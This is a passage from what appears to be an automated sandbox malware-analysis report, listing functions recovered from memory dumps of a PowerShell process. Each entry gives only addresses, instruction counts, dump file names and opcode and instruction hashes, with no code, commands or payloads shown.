                                        • Opcode Fuzzy Hash: 91a4f406c97246a3eb609dc3a4d8880a361b836ea98e0625fe1bc30511c3e888
                                        • Instruction Fuzzy Hash: 4E919D34B002198FCB14CF79C59496EBBE7AF88714B14846EE805EB364EB75ED42CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C729F0 Relevance: .2, Instructions: 235COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 688bf434aad868347e960be84e20ac4ad7d477eed3bcc9c50c06c0701c5f03e3
                                        • Instruction ID: 98906809e321daa0b472ef62ec6cd27bea11e1c9833baccb92bd753be7ec5822
                                        • Opcode Fuzzy Hash: 688bf434aad868347e960be84e20ac4ad7d477eed3bcc9c50c06c0701c5f03e3
                                        • Instruction Fuzzy Hash: 28A1AD70A002458FCB16CF59C4949AEFBB2FF89310B2485AAD8559B3A5C735FC41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7B650 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ea049585acd0c953a295b1f482294431cf0da2b2a33f2f7630c35b419a0023c
                                        • Instruction ID: b2d0686f5002f3194b67ee83abcbef1227d9568cc28b2d3274053486f693727b
                                        • Opcode Fuzzy Hash: 5ea049585acd0c953a295b1f482294431cf0da2b2a33f2f7630c35b419a0023c
                                        • Instruction Fuzzy Hash: 93611875E002489FCB14DFA9D584A9DFBF2EF88314F188069E818EB354EB74AD45CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7B660 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da9dc567e65b53016c055c3576c39a2a4bd9fba6f5bba4cab4ecd2de4a9dc8e
                                        • Instruction ID: cc195f8618352441ae22165a1d1aefcd3154ee46df376e9aef2c6d7290deff36
                                        • Opcode Fuzzy Hash: 5da9dc567e65b53016c055c3576c39a2a4bd9fba6f5bba4cab4ecd2de4a9dc8e
                                        • Instruction Fuzzy Hash: 52610875E002489FCB14DFA9C584A9DFBF2FF88314F198169E809AB354EB74AD45CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77450 Relevance: .2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50c9d5f2c9b43adc8df4c63c8a0ea3cd2e7c920161829aeac475de16d56ff093
                                        • Instruction ID: 7a080eb62d8173ce47cbbc16acb762ef3cc0446d975ff61536e49af34d1f4c15
                                        • Opcode Fuzzy Hash: 50c9d5f2c9b43adc8df4c63c8a0ea3cd2e7c920161829aeac475de16d56ff093
                                        • Instruction Fuzzy Hash: 07419D35301219DFD744DB69D854A7A77EBFF88214F15846AE50ACB751EB31FC028B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7AA00 Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: defd7e8795612bee84e54ce15789faf7c9ee4113a9a76ef83805a62e1f4dd293
                                        • Instruction ID: ee04350567123db46a72b025ef34a18af43aaddb9362b70841b08997cbc30739
                                        • Opcode Fuzzy Hash: defd7e8795612bee84e54ce15789faf7c9ee4113a9a76ef83805a62e1f4dd293
                                        • Instruction Fuzzy Hash: 24319E70A002099BDB08DF79D5946AEBFF7AF89364F148039E401EB750EA369C418F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77170 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02aaaefc5bbd86418c08ae5f6f4cc951035acda99655c29ec95c7db290635937
                                        • Instruction ID: 995f3c2d774a68cc79aaa0b605e5e67acaf96678399b0c14f8a91e401e46fc48
                                        • Opcode Fuzzy Hash: 02aaaefc5bbd86418c08ae5f6f4cc951035acda99655c29ec95c7db290635937
                                        • Instruction Fuzzy Hash: 5C31F934A01209CFCB14DFA5C558AA9BBF2AB8D715F2450A8E506AB395DB35ED01CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C772DB Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fca31dc7c64136dd9066c7485dcee3400de2f7ad05ea8e2e233e66148b3e07a4
                                        • Instruction ID: 127fee79630bfe82c731c7ec0ee88d3e51817b91bc3cb3cd431fd339ec974139
                                        • Opcode Fuzzy Hash: fca31dc7c64136dd9066c7485dcee3400de2f7ad05ea8e2e233e66148b3e07a4
                                        • Instruction Fuzzy Hash: 282194393001058FD714DF7DD894A3A77D7EBC82657194079EA49CB355DE35EC068790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77161 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e082e9a9f41179a025b5fe9cc45ff0eee7f12d2b68f38b642359a85ab1209c6
                                        • Instruction ID: 3c44cfcac5b75fb9f9bf3a6afc804951b5cdd106f8db1d39588679aae86d7805
                                        • Opcode Fuzzy Hash: 4e082e9a9f41179a025b5fe9cc45ff0eee7f12d2b68f38b642359a85ab1209c6
                                        • Instruction Fuzzy Hash: C931F834B01209CFCB14DFA5C558AA9BBF2AF8D715F2440A8E516AB3A5DB35ED01CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7D9C5 Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6e726f7aab24e065cdc7f4b4dab6236bae144a3682235b7d3450d10fcb94ef6
                                        • Instruction ID: e1cdf3307ffe76d3a1f96f35a1f81daa1e986bcd21e762c31a798e82e108c88c
                                        • Opcode Fuzzy Hash: b6e726f7aab24e065cdc7f4b4dab6236bae144a3682235b7d3450d10fcb94ef6
                                        • Instruction Fuzzy Hash: 6421D631E082849FDB05CB69D4547EDBFB3AF89314F0C80BAC457AB292DB716A45CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7AA10 Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc7344fdacccfa2fab2fb35c50739f447b7fe76dc72fd2989ed124eb1860dd4b
                                        • Instruction ID: 0e729b27b0876fa7489bcd8024be12d7132acd474e3d52ab346e168e95177387
                                        • Opcode Fuzzy Hash: cc7344fdacccfa2fab2fb35c50739f447b7fe76dc72fd2989ed124eb1860dd4b
                                        • Instruction Fuzzy Hash: 8C314870A002099FDB08DFA9C5957AEBBF7AF88350F148039E401EB360EA759C418F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78F87 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc86f08b4afa26aa4b64d32d945263a7e7d3da5307ce022788bf19a059725f71
                                        • Instruction ID: 028e9f2a8fb29cdf0e7ee36628da18706ecb9483ff677b78ba25c426832c281f
                                        • Opcode Fuzzy Hash: cc86f08b4afa26aa4b64d32d945263a7e7d3da5307ce022788bf19a059725f71
                                        • Instruction Fuzzy Hash: 953189B09157449FEB60CF6ED0897DAFBE6EB88320F28C02EC8589B215C7746481CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 032FF310 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2e6f303f5dadc4e259876832eae997470c4bffa4582ce1880e18f32806339f1
                                        • Instruction ID: 502c4d2f5dca262d51b96aa4b5eee9bc48aeb5f0e5feedf9c6373deb48bb4736
                                        • Opcode Fuzzy Hash: e2e6f303f5dadc4e259876832eae997470c4bffa4582ce1880e18f32806339f1
                                        • Instruction Fuzzy Hash: 1A21F475514280EFCF05DF14DAC0B1AFFA5FB88314F24C5B9EA094A256C376D496CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78F98 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e91714a35fbe92964304c44db120266fc12a60561182ca8b7ea6027937751893
                                        • Instruction ID: cdbda1012ed726147c25fa3a7f0077956c5215f144013c77822096236e3cae73
                                        • Opcode Fuzzy Hash: e91714a35fbe92964304c44db120266fc12a60561182ca8b7ea6027937751893
                                        • Instruction Fuzzy Hash: 67216BB4A157448FEB60CF6AD48839AFBF6EB88310F28C42DD85D97205D77464808B51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0797201B Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25015f0a2f634b9cbae5567878eebfc7f754f5d19f6f82d9c31e18759158c7d3
                                        • Instruction ID: efae5012469d88f46fb9be5086ae534bf273c7d1255d04ab5868239851a41245
                                        • Opcode Fuzzy Hash: 25015f0a2f634b9cbae5567878eebfc7f754f5d19f6f82d9c31e18759158c7d3
                                        • Instruction Fuzzy Hash: 6C115EF1A24206DFCF24CF59C944AA6B7F9FB4521AF048176D6088B221D771D988CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07972020 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca3cdd734e75441c1ec61a4fb7755c878238c088e5ed5f9a7f911777b109b852
                                        • Instruction ID: 27e3135509c46a1e5f76baef4af7d137b7d957a1f4a071a9c187c8a258f0cc2c
                                        • Opcode Fuzzy Hash: ca3cdd734e75441c1ec61a4fb7755c878238c088e5ed5f9a7f911777b109b852
                                        • Instruction Fuzzy Hash: D4116DF1A24206DFCF24CF59C944B66B7F9FB4521AF048076D60887221D771D988CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DB98 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aae4c87e2eed7d279feee35541703b2a5f4f43983c63dda3efa4cefc1dd93bd9
                                        • Instruction ID: c79518556ea680661ccbff1f6c8bdb5a0efb4bedaca87ac0d8365442f05b4f30
                                        • Opcode Fuzzy Hash: aae4c87e2eed7d279feee35541703b2a5f4f43983c63dda3efa4cefc1dd93bd9
                                        • Instruction Fuzzy Hash: 5901D2353042108FC7119B68E44886ABBBAEFCE792B0440AAE14BCB321CA71EC41CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 032FF30B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction ID: a562c101cd7aac1e12c31d6ba4d3aaddcf292c60aebd407c8384f0d8efd65d7b
                                        • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction Fuzzy Hash: A3219D76504281DFCF06CF14DAC4B16FF72FB48314F28C5A9EA494A656C33AD4AACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7B880 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f54943a08d317aac815f8b3f8d7e749cb5d39469397cb1eb276f64dfe7fc940
                                        • Instruction ID: 51c2f69a5fdd35fa396d61c0bb775f84e0779422955fc8a0fa40436cb4c392d5
                                        • Opcode Fuzzy Hash: 7f54943a08d317aac815f8b3f8d7e749cb5d39469397cb1eb276f64dfe7fc940
                                        • Instruction Fuzzy Hash: 4D11D6316043405FDB18CF39D49459A7FE6EF45354F1484AAE05ACB661EB34FC45C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DC90 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b806611fa2767773c394b236bf9cce249a9b142fb2bba868103b6124323cbc22
                                        • Instruction ID: 87c9b3ef9761e4ff0cb192a78716b99b84c451e56c57d93cfadf38642010f310
                                        • Opcode Fuzzy Hash: b806611fa2767773c394b236bf9cce249a9b142fb2bba868103b6124323cbc22
                                        • Instruction Fuzzy Hash: 0611F3342057508FC728DF39D08099ABBF6AF8921572089ADD48A8BBA0CB32F845CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 032FD006 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b32f061e2a510384c3ac4286b4327c71204106c8fe5b4b10547d37e7c40e646e
                                        • Instruction ID: 02a8f20e2da2125ea5523e2824887a370052be01af734a6442ccd25e88344a9f
                                        • Opcode Fuzzy Hash: b32f061e2a510384c3ac4286b4327c71204106c8fe5b4b10547d37e7c40e646e
                                        • Instruction Fuzzy Hash: B9012D7100E3C09FD7128B258894B52BFB4EF47224F1D84DBD9888F1A7C2699849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 032FD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bda2926e6e3502a64482d3f8706b7792b2026aeaadcaed7cae44132c73a21cc9
                                        • Instruction ID: ee38a30a19e7cd2418f05e4e49576c171e16e7913255be0558d7df8fb6ae03e6
                                        • Opcode Fuzzy Hash: bda2926e6e3502a64482d3f8706b7792b2026aeaadcaed7cae44132c73a21cc9
                                        • Instruction Fuzzy Hash: CF01F231019305AFE710CE29CA84B67FF98EF41324F0CC57EEE084B24AC2799881CAB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DBF8 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd1ca81dac97d94f2dbcf07f074a5e25ab35a8fb099f2e7d4505ce0ed37afe72
                                        • Instruction ID: 26ec51ad7ae4ef6bc606f14410ce0c206d191dbcb020f81c2f1ca61f70647368
                                        • Opcode Fuzzy Hash: bd1ca81dac97d94f2dbcf07f074a5e25ab35a8fb099f2e7d4505ce0ed37afe72
                                        • Instruction Fuzzy Hash: F00108313007109FCB699B79E898A5A7BAAFB8D356F14846CE10FC3351CB76AC46CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DBE8 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51abbcd541f269ba0108d43a70b6b0264f3b481451c580aee2e2a8c8ce8cc1bb
                                        • Instruction ID: 28c6dd49311546441e64231755571d8678b70c59b9c5f89559e996134439c8f3
                                        • Opcode Fuzzy Hash: 51abbcd541f269ba0108d43a70b6b0264f3b481451c580aee2e2a8c8ce8cc1bb
                                        • Instruction Fuzzy Hash: 7B01A231305750DFC7165B78A84C69A7F6AFF8A352F08406DE14BC7251CB76A846CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7F640 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a85271b21c68f97b209a34dd1feefa98365da8a3e663bb6bb5d96c3085871f1
                                        • Instruction ID: 1b640f063da7cb6f5ae8af62ee7146a98518c823b6ea1ef062288c9bcd110509
                                        • Opcode Fuzzy Hash: 5a85271b21c68f97b209a34dd1feefa98365da8a3e663bb6bb5d96c3085871f1
                                        • Instruction Fuzzy Hash: 17F06D367043149FDB086EA5A88996B7BAAFBC9266710843FE50A87340EE32D815C760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77667 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4857626d464709f9e603119f4a91161ed941ab249b9383d4d7beb7ee181c89c2
                                        • Instruction ID: 42f67d019954bf8119a62c6448f357e16b60dd2b672797e0714efce556cc10eb
                                        • Opcode Fuzzy Hash: 4857626d464709f9e603119f4a91161ed941ab249b9383d4d7beb7ee181c89c2
                                        • Instruction Fuzzy Hash: A6F08B353007009FC705AB24988866E7BF6FF89224700082FD149C7362CF306D06C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 032FD9A7 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 219cc502b28fe23560d654feb38520f7e23adf809264c7c47b761153ecc0db0f
                                        • Instruction ID: 2e0ca27fb1b6dbdf16df2ffb8ef6e20640bf968f97b6cad3fb74091428ffb79b
                                        • Opcode Fuzzy Hash: 219cc502b28fe23560d654feb38520f7e23adf809264c7c47b761153ecc0db0f
                                        • Instruction Fuzzy Hash: 93F0F976200604AFD720CF0AD985C23FBADEBD4670719C56AE94A5B615C671FC41CEB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78C6F Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a8f677948fc6ec55187bea0031dfc1efb9bab493e43e676df90a787b5accaab
                                        • Instruction ID: 169f5958c0d8103769dd54e6911cccf4cbf090e74b2e15687a15a3bc672135b9
                                        • Opcode Fuzzy Hash: 0a8f677948fc6ec55187bea0031dfc1efb9bab493e43e676df90a787b5accaab
                                        • Instruction Fuzzy Hash: CAF046786146445FE701AB78C0193AFBBA6DFC5368F14827BC9098B3C3CE399946CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 032FD998 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2021779685.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 994a12972a710940adea26d52971456ffd7554fa40ee583ccb373139e4f84b68
                                        • Instruction ID: 4b98550f5c8baac84b60e265d89e40a9276cee2990c530af8440fe3cdef1c693
                                        • Opcode Fuzzy Hash: 994a12972a710940adea26d52971456ffd7554fa40ee583ccb373139e4f84b68
                                        • Instruction Fuzzy Hash: 58F0F975110A40AFD725CF06C985D23BBB9EB89660B198499E85A5B712C671FC42CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77678 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed01e050cacd4bb7a65b08423bb2ac453ac1954586a166a44c9c9d88d8c8a68a
                                        • Instruction ID: 050824681c86cb2449e04e53840e24876002543888e3155f63ef31e5e724c9f0
                                        • Opcode Fuzzy Hash: ed01e050cacd4bb7a65b08423bb2ac453ac1954586a166a44c9c9d88d8c8a68a
                                        • Instruction Fuzzy Hash: 77F0A035700719AFCB10AB5AD888A6FB7EAEB88275B10092DE10AC3710DF70BD4587A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7D9D5 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17c69cf8851b5556272a8972ac95ff7db761d4c6eff404952bd79ddc2d811d46
                                        • Instruction ID: 9b1e65c2bf03cb56bbdde8edc492d32f1c445833f8913b67472895828f67eee5
                                        • Opcode Fuzzy Hash: 17c69cf8851b5556272a8972ac95ff7db761d4c6eff404952bd79ddc2d811d46
                                        • Instruction Fuzzy Hash: 28F02773B081808BC78986ACC8540DCFF62DF89250F0C81FFC457D7751E6A19509C342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78C80 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cefb13fa8b8027d32171912a0d26110cc3529e517086694639c61ba623967d94
                                        • Instruction ID: 2d6c95ea184c830859e0193f18f7a642918b2d2428b2a866a69252878be0ba52
                                        • Opcode Fuzzy Hash: cefb13fa8b8027d32171912a0d26110cc3529e517086694639c61ba623967d94
                                        • Instruction Fuzzy Hash: 54F02E796006045BE700EB68C0193AFB7A6DFC4758F10813ECA0947385CE396941CBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7AB28 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
